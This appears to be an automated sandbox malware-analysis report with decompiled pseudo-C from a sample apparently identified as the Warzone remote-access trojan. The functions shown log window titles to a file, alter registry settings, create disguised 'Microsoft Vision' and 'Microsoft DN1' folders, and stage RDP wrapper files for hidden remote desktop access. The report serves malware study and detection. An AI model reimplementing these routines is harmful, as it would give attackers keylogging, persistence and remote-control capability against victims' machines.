							E00404A77(_v12, _t117, _a4); // executed
							E00402DFF( &_v44);
							continue;
						}
						L11:
						 *((intOrPtr*)( *_a4 + 4))();
						E00402DFF( &_v24);
						return E00402DFF( &_v52);
					}
				}
				return _t50;
			}

0x004050cc
0x004050cc
0x004050d4
0x004050d9
0x004050e2
0x004050e5
0x004050f0
0x00405105
0x0040511a
0x0040511f
0x0040512a
0x00405133
0x0040513b
0x00405140
0x00405143
0x00405146
0x00405148
0x0040514b
0x00405150
0x00000000
0x00405151
0x00405154
0x0040515f
0x0040515f
0x0040516c
0x00405172
0x00405178
0x0040517d
0x00000000
0x00000000
0x00405186
0x0040518d
0x00405197
0x004051a1
0x004051ae
0x004051bb
0x004051c3
0x004051ce
0x004051d1
0x004051d6
0x004051d9
0x004051e1
0x004051e6
0x004051e6
0x004051ec
0x004051f9
0x00405200
0x00000000
0x00405206
0x0040520d
0x00405212
0x0040521f
0x0040522c
0x00405234
0x00405239
0x0040523e
0x00405249
0x00405251
0x00405259
0x00405263
0x0040526b
0x00000000
0x0040526b
0x00405275
0x0040527a
0x00405280
0x00000000
0x00405288
0x00405146
0x00405291

APIs

setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 00405105

Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

recv.WS2_32(000000FF,?,00001000,00000000), ref: 00405172

Strings

warzone160, xrefs: 00405125
`, xrefs: 004050F0

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeVirtuallstrcpyrecvsetsockopt
String ID: `$warzone160
API String ID: 3030020704-811885577
Opcode ID: 588dd872dce32ade3b3bca8ac52b360bf24bf3ea8917908afc2f702d693b886d
Instruction ID: 1d6c602b324719ea64b6484aba862982e091331808973946a6b95fe40e6be195
Opcode Fuzzy Hash: 588dd872dce32ade3b3bca8ac52b360bf24bf3ea8917908afc2f702d693b886d
Instruction Fuzzy Hash: C0516171900119ABDB04EB95CD8AEEEB778EF04354F10423EF511B71D1DAB85E45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00407966 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407966(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				struct HWND__* _t34;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t69;
				void* _t70;
				void* _t73;
				void* _t74;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E00401052( &_v536, 0, 0x208);
				_v8 = 0;
				_t34 = GetForegroundWindow(); // executed
				_t35 = GetWindowTextW(_t34,  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E004030C5( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E004033AB( &_v12,  &_v536); // executed
					_t74 = E00403230( &_v8, _t94, _t106, "{"); // executed
					E004030FB(_t74, _t106, _t73); // executed
					E00403230(_t74, _t94, _t106, "}"); // executed
					E004058FB(_v12);
					_v12 = 0;
				}
				_t37 =  *0x4166ac; // 0x416d98
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x4166ac; // 0x416d98
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x4166ac; // 0x416d98
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t69 = E004033AB( &_v12, _t40 + 0x210); // executed
					_t70 = E0040300E( &_v8, _t69);
					E004058FB(_v12);
					_t40 =  *0x4166ac; // 0x416d98
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t18 = _t43 + 0xc; // 0x1f70000, executed
				_t44 = CreateFileW( *_t18, 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x4166ac; // 0x416d98
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x416da0
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x4166ac; // 0x416d98
					_t22 = _t55 + 4; // 0x268, executed
					WriteFile( *_t22, _t98, _t54, _t21, 0);
					_t57 =  *0x4166ac; // 0x416d98
					_t59 = E00403027( &_v8);
					_t61 =  *0x4166ac; // 0x416d98
					_t25 = _t61 + 4; // 0x268, executed
					WriteFile( *_t25, _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x4166ac; // 0x416d98
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x4166ac; // 0x416d98
					_t26 = _t66 + 4; // 0x268, executed
					WriteFile( *_t26, _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x4166ac; // 0x416d98
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x416da0
				_t46 = lstrlenW(_t97);
				_t48 =  *0x4166ac; // 0x416d98
				_t29 = _t48 + 4; // 0x268, executed
				WriteFile( *_t29, _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x4166ac; // 0x416d98
				_t30 = _t50 + 4; // 0x268, executed
				CloseHandle( *_t30); // executed
				return E004058FB(_v8);
			}

0x00407966
0x00407979
0x00407984
0x0040798c
0x0040798f
0x004079a2
0x004079a8
0x004079aa
0x004079f5
0x004079ac
0x004079b6
0x004079c5
0x004079cf
0x004079db
0x004079e3
0x004079e8
0x004079e8
0x004079fa
0x00407a0b
0x00407a0f
0x00407a14
0x00407a4f
0x00407a52
0x00407a52
0x00407a58
0x00407a5e
0x00407a63
0x00407a16
0x00407a1f
0x00407a28
0x00407a32
0x00407a37
0x00407a3c
0x00407a41
0x00000000
0x00407a43
0x00407a43
0x00407a43
0x00407a41
0x00407a76
0x00407a79
0x00407a7f
0x00407a91
0x00407a94
0x00407a98
0x00407a9b
0x00407aa2
0x00407aa5
0x00407aab
0x00407aae
0x00407ab0
0x00407ac1
0x00407ac9
0x00407acf
0x00407ad2
0x00407ad4
0x00407ad9
0x00407ae5
0x00407ae8
0x00407aee
0x00407af1
0x00407af3
0x00407af3
0x00407af9
0x00407afc
0x00407b03
0x00407b08
0x00407b0e
0x00407b11
0x00407b13
0x00407b18
0x00407b1b
0x00407b2d

APIs

GetForegroundWindow.USER32 ref: 0040798F
GetWindowTextW.USER32 ref: 004079A2
lstrlenW.KERNEL32(00416B88,{Unknown},?,?), ref: 00407A0B
lstrcpyW.KERNEL32(00416B88,?), ref: 00407A58
CreateFileW.KERNEL32(01F70000,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00407A79
lstrlenW.KERNEL32(004127C0,00416DA0,00000000,?,?), ref: 00407AA2
WriteFile.KERNEL32(00000268,004127C0,00000000,?,?), ref: 00407AAE
WriteFile.KERNEL32(00000268,?,00000000,00416D90,00000000), ref: 00407AD2
lstrlenW.KERNEL32(004127C0,00416D90,00000000,?,?), ref: 00407AE5
WriteFile.KERNEL32(00000268,004127C0,00000000,?,?), ref: 00407AF1
lstrlenW.KERNEL32(?,00416DA0,00000000,?,?), ref: 00407B03
WriteFile.KERNEL32(00000268,?,00000000,?,?), ref: 00407B11
CloseHandle.KERNEL32(00000268), ref: 00407B1B

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Strings

{Unknown}, xrefs: 004079ED

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
String ID: {Unknown}
API String ID: 2314120260-4054869793
Opcode ID: e038a5d41f9008b2011a1c5c406468064fc3d129e83e2a0fb709ba3988531c0f
Instruction ID: 303d7499d8a5dd8a903ce4ae6e17ec2a2eab696862b502e647beeac0fcca0d5e
Opcode Fuzzy Hash: e038a5d41f9008b2011a1c5c406468064fc3d129e83e2a0fb709ba3988531c0f
Instruction Fuzzy Hash: 32514FB1A00108BFDB00EB65DD85EDA7BA8EF04304F05817AF509E72A1DB75EE51CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00410A7C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 120
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00410A7C(void* __edx, void* __edi, void* __eflags) {
				char _v576;
				char _v592;
				char _v1104;
				short _v1124;
				char _v1200;
				intOrPtr _v1208;
				char _v1212;
				char _v1216;
				char _v1232;
				intOrPtr _v1248;
				intOrPtr _v1272;
				intOrPtr _v1280;
				char _v1284;
				char _v1288;
				int _v1296;
				char _v1304;
				void* _v1308;
				char _v1312;
				char _v1316;
				char _v1320;
				char _v1324;
				intOrPtr _v1336;
				void* _t78;
				char* _t92;
				void* _t96;
				void* _t97;
				void* _t102;

				_t102 = __eflags;
				_t97 = __edi;
				_t96 = __edx;
				_v1304 = 0xa;
				_v1296 = 0;
				E00405647( &_v1284);
				E0040EF3C( &_v1212);
				E00401085(GetTickCount());
				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1308,  &_v1296); // executed
				RegSetValueExA(_v1308, "MaxConnectionsPer1_0Server", 0, 4,  &_v1304, 4); // executed
				RegSetValueExA(_v1308, "MaxConnectionsPerServer", 0, 4,  &_v1304, 4); // executed
				RegCloseKey(_v1308); // executed
				E0040549D( &_v1284, _t96, _t102); // executed
				E0040EDAA( &_v1212, _t96, _t102,  &_v1284); // executed
				E004049F9( &_v576, _t96, _t102,  &_v1288,  &_v1216); // executed
				E00401052( &_v1104, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1104, _t78); // executed
				lstrcatW( &_v1124, L"\\Microsoft Vision\\");
				CreateDirectoryW( &_v1124, 0); // executed
				_t103 = _v1208;
				if(_v1208 != 0) {
					L3:
					__eflags = _v1248;
					if(__eflags != 0) {
						E0040F628();
					}
					E0040496D( &_v592, _t96, __eflags); // executed
				} else {
					E0040EC15( &_v1232, _t103, _v1280, _v1272); // executed
					_t104 = _v1288;
					if(_v1288 == 0) {
						goto L3;
					} else {
						_v1312 = 0;
						_t92 =  &_v1320;
						E004033F3(_t92,  &_v1200);
						_push(_t92);
						E0040E6C4( &_v1312, _t104,  &_v1324,  &_v1316);
						E004058FB(_v1336);
						E004058FB(0);
					}
				}
				E00404709( &_v592, _t97, _t104);
				E0040EBB6( &_v1232);
				E0040566C( &_v1304, _t97);
				return 0;
			}

0x00410a7c
0x00410a7c
0x00410a7c
0x00410a8b
0x00410a97
0x00410a9b
0x00410aa4
0x00410ab0
0x00410ad3
0x00410aec
0x00410b05
0x00410b0f
0x00410b19
0x00410b27
0x00410b3d
0x00410b50
0x00410b65
0x00410b78
0x00410b87
0x00410b8d
0x00410b94
0x00410be8
0x00410be8
0x00410bec
0x00410bee
0x00410bee
0x00410bfa
0x00410b96
0x00410ba2
0x00410ba7
0x00410bab
0x00000000
0x00410bad
0x00410bb4
0x00410bb9
0x00410bbd
0x00410bc2
0x00410bd1
0x00410bda
0x00410be1
0x00410be1
0x00410bab
0x00410c06
0x00410c0f
0x00410c18
0x00410c23

APIs

GetTickCount.KERNEL32 ref: 00410AA9
RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,0000000A,?), ref: 00410AD3
RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00410AEC
RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00410B05
RegCloseKey.KERNEL32(?), ref: 00410B0F

Part of subcall function 0040549D: GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 004054BB

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00410B65
lstrcatW.KERNEL32 ref: 00410B78
CreateDirectoryW.KERNEL32(?,00000000), ref: 00410B87

Part of subcall function 0040EC15: CopyFileW.KERNEL32 ref: 0040ECB6

Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D

Part of subcall function 0040E6C4: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040E6FF

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Strings

\Microsoft Vision\, xrefs: 00410B6B
MaxConnectionsPerServer, xrefs: 00410AFC
Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00410AC9
MaxConnectionsPer1_0Server, xrefs: 00410AE3

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Create$Value$CloseCopyCountDirectoryFileFolderFreeHandleModulePathProcessTickVirtuallstrcatlstrcpy
String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
API String ID: 1409056222-2552559493
Opcode ID: 087f96d6f3c5d8aae205a1851a7a663cfe75c4ff8a290a4a6167db5a4c37299b
Instruction ID: 2c1a965c603952f13ef9a272816097f7785e58fc32debb4f15ee24fca69ed625
Opcode Fuzzy Hash: 087f96d6f3c5d8aae205a1851a7a663cfe75c4ff8a290a4a6167db5a4c37299b
Instruction Fuzzy Hash: C74102B2048345AFD310EB61DC85EEF77ACFB94304F40493FB695A20A1DB749A58CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00410024 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 138
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00410024(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x4123c0, 0, 1, 0x414674, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x4123b0,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t50 = _v24 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x412340,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E004059A9(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E004102DC(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E004023B2(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}

0x0041002d
0x0041002f
0x00410033
0x00410039
0x0041003c
0x0041004d
0x00410050
0x00410053
0x00410059
0x0041005e
0x00410071
0x00410074
0x00410079
0x00410082
0x00410085
0x00410137
0x00410137
0x00410141
0x0041014a
0x0041014f
0x00000000
0x00000000
0x00410099
0x004100a0
0x004100a5
0x00000000
0x00000000
0x004100af
0x004100b5
0x004100bb
0x004100bc
0x004100bd
0x004100c4
0x004100ca
0x004100e3
0x004100e5
0x004100ed
0x004100fa
0x004100ef
0x004100f6
0x004100f6
0x004100fc
0x004100ff
0x00410105
0x00410125
0x00410129
0x0041012f
0x00410134
0x00410135
0x00000000
0x00410107
0x00410107
0x00410109
0x0041010c
0x00410112
0x00410114
0x00410117
0x0041011a
0x0041011b
0x0041011e
0x00410120
0x00000000
0x00410109
0x00410105
0x004100cc
0x004100dc
0x004100e1
0x00000000
0x00000000
0x00000000
0x004100e1
0x00410155
0x0041015a
0x0041015f
0x00410162
0x00410162
0x00410165
0x0041016a
0x0041016f
0x00410172
0x00410172
0x00410175
0x00000000
0x00410175
0x00410079
0x0041017f

APIs

CoInitialize.OLE32(00000000), ref: 00410033
CoCreateInstance.OLE32(004123C0,00000000,00000001,00414674,?), ref: 00410053
VariantInit.OLEAUT32(?), ref: 004100AF
CoUninitialize.OLE32 ref: 00410175

Strings

Description, xrefs: 004100BD
FriendlyName, xrefs: 004100D4

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CreateInitInitializeInstanceUninitializeVariant
String ID: Description$FriendlyName
API String ID: 4142528535-3192352273
Opcode ID: 6d20e00ca966b8dbfdfbaa11dbd1bdf627fece8503d30d63524169da3f77f178
Instruction ID: 1679b5daa5e56776667f780f310485ebc2bb9a6e1d215311ad91f329a2dc5fe0
Opcode Fuzzy Hash: 6d20e00ca966b8dbfdfbaa11dbd1bdf627fece8503d30d63524169da3f77f178
Instruction Fuzzy Hash: 91413574A00209AFCB14DFA5C984EEFBBB9FF89704B14845EE501EB250D7B9D981CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040C74B Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0040C74B(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t6;
				void* _t9;
				void* _t10;
				void* _t14;
				void* _t22;
				void* _t31;
				intOrPtr _t32;
				void* _t50;
				intOrPtr _t53;
				void* _t62;

				_t50 = __edx;
				_push(__ecx);
				InitializeCriticalSection(0x417cc8);
				_t53 = 5;
				asm("xorps xmm0, xmm0");
				 *0x417d14 = _t53;
				 *0x417d0c = _t53;
				_t31 = 0x18;
				asm("movups [0x417ce0], xmm0");
				 *0x417cf0 = 0;
				asm("movups [0x417cf8], xmm0");
				 *0x417d10 = 0;
				_t6 = E004059A9(_t31);
				if(_t6 == 0) {
					_t32 = 0;
				} else {
					 *_t6 = _t53;
					_t1 = _t6 + 4; // 0x4
					_t32 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x417d08 = _t32;
				 *0x417d20 = 0;
				 *0x417d24 = 0; // executed
				E004030C5(0x417cf0, _t50, L"TermService"); // executed
				_t54 = L"%ProgramFiles%";
				E004030C5(0x417cfc, _t50, L"%ProgramFiles%"); // executed
				_t9 = E0040D780(0x417cfc);
				_t65 = _t9 - 1;
				if(_t9 != 1) {
					_t51 = 0x417cfc;
					_t10 = E00402F9A( &_v8, 0x417cfc, __eflags);
					_t62 = 0x417d00;
					E004031FD(0x417d00, _t10);
					E004058FB(_v8);
				} else {
					E004030C5(0x417cfc, _t50, L"%ProgramW6432%"); // executed
					_t51 = 0x417cfc;
					_t22 = E00402F9A( &_v8, 0x417cfc, _t65); // executed
					_t62 = 0x417d00;
					E004031FD(0x417d00, _t22); // executed
					E004058FB(_v8);
					E004030C5(0x417cfc, 0x417cfc, _t54); // executed
				}
				_t55 = L"\\Microsoft DN1";
				E00403230(_t62, _t51, _t65, L"\\Microsoft DN1"); // executed
				_t14 = E00403230(0x417cfc, _t51, _t65, _t55); // executed
				E0040D4D0(_t14, _t62);
				E004031FD(0x417d04, _t62); // executed
				E00403230(0x417d04, _t51, _t65, L"\\rdpwrap.ini"); // executed
				_t57 = L"\\sqlmap.dll";
				E00403230(_t62, _t51, _t65, L"\\sqlmap.dll"); // executed
				E00403230(0x417cfc, _t51, _t65, _t57); // executed
				return 0x417cc8;
			}

0x0040c74b
0x0040c74e
0x0040c757
0x0040c75f
0x0040c760
0x0040c763
0x0040c76b
0x0040c773
0x0040c774
0x0040c77b
0x0040c781
0x0040c788
0x0040c78e
0x0040c795
0x0040c7a7
0x0040c797
0x0040c797
0x0040c799
0x0040c799
0x0040c7a0
0x0040c7a1
0x0040c7a2
0x0040c7a3
0x0040c7a4
0x0040c7a4
0x0040c7a9
0x0040c7b9
0x0040c7bf
0x0040c7c5
0x0040c7ca
0x0040c7d7
0x0040c7dc
0x0040c7e1
0x0040c7e4
0x0040c81b
0x0040c820
0x0040c825
0x0040c82d
0x0040c835
0x0040c7e6
0x0040c7ed
0x0040c7f2
0x0040c7f7
0x0040c7fc
0x0040c804
0x0040c80c
0x0040c814
0x0040c814
0x0040c83a
0x0040c842
0x0040c84a
0x0040c851
0x0040c85e
0x0040c86a
0x0040c86f
0x0040c877
0x0040c87f
0x0040c88d

APIs

InitializeCriticalSection.KERNEL32(00417CC8), ref: 0040C757

Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3

Part of subcall function 00402F9A: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00402FCD

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Strings

%ProgramFiles%, xrefs: 0040C7CA, 0040C7D4, 0040C811
\sqlmap.dll, xrefs: 0040C86F, 0040C876, 0040C87C
%ProgramW6432%, xrefs: 0040C7E6
TermService, xrefs: 0040C7B4
\Microsoft DN1, xrefs: 0040C83A, 0040C841, 0040C847
\rdpwrap.ini, xrefs: 0040C863

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
String ID: %ProgramFiles%$%ProgramW6432%$TermService$\Microsoft DN1$\rdpwrap.ini$\sqlmap.dll
API String ID: 2811233055-2974354589
Opcode ID: c00c295642618586e8b158804c4c16bd5fa2d59d97c082f640f566a4fa7c8735
Instruction ID: 73c3124989871fc7ef99486f1ca8238afbb50c074eb302be562dfbf628a52383
Opcode Fuzzy Hash: c00c295642618586e8b158804c4c16bd5fa2d59d97c082f640f566a4fa7c8735
Instruction Fuzzy Hash: 2431C131B1411467C7057F66AC529BF2A7E9BC5B15310803FB4026B2D2DF7C9A82479D

Uniqueness

Uniqueness Score: -1.00%

Function 00402AFF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402AFF(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v56;
				char _v320;
				short _v840;
				void* _t20;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t30;
				void* _t40;
				void* _t47;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_t60 = __edx;
				_t59 = __ecx;
				GetModuleFileNameA(0,  &_v320, 0x104);
				_v16 = 0;
				_t20 = E0040F5C8( &_v320,  &_v16); // executed
				_v12 = 0;
				E0040F2C7(_t20, _v16,  &_v12,  &_v12);
				_pop(_t47);
				_push(_v12);
				E004033AB(_t61, 0x412428); // executed
				_t49 = _t61; // executed
				E0040D7A6(_t61); // executed
				_t24 = E0040D780(_t61);
				_t25 = E0040D724(); // executed
				_t26 = E0040D56A();
				E0040D7E0(_t61, _v16); // executed
				_t28 = E00403E02( &_v56, _v16, _t63, _t61, _t61, _t49, 0xb8, _t26, _t25, _t24, _t61, _t47); // executed
				E00404A3D(_t59, _t28); // executed
				_t30 = E00403DD8( &_v56);
				if( *((intOrPtr*)(_t60 + 0x34)) != 0) {
					E00401052( &_v840, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v840);
					lstrcatW( &_v840, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v840, 0); // executed
					E00408431(_t59, 1); // executed
					_v12 = 0x414784;
					_t40 = E00404A3D(_t59,  &_v12); // executed
					return _t40;
				}
				return _t30;
			}

0x00402aff
0x00402b1a
0x00402b1c
0x00402b1e
0x00402b27
0x00402b30
0x00402b3f
0x00402b42
0x00402b48
0x00402b49
0x00402b54
0x00402b5a
0x00402b5c
0x00402b61
0x00402b67
0x00402b6d
0x00402b7d
0x00402b86
0x00402b8e
0x00402b96
0x00402b9e
0x00402bad
0x00402bc1
0x00402bd3
0x00402be1
0x00402bea
0x00402bf2
0x00402bfc
0x00000000
0x00402bfc
0x00402c05

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B1E

Part of subcall function 0040F5C8: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F5F5
Part of subcall function 0040F5C8: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00402B35), ref: 0040F600
Part of subcall function 0040F5C8: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040F611
Part of subcall function 0040F5C8: CloseHandle.KERNEL32(00000000), ref: 0040F618

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 0040D7A6: GetComputerNameW.KERNEL32(?,00000010), ref: 0040D7C9

Part of subcall function 0040D780: GetCurrentProcess.KERNEL32(?,?,00402B66,?,00412428,?,?), ref: 0040D784

Part of subcall function 0040D724: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0040D736
Part of subcall function 0040D724: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0040D73D
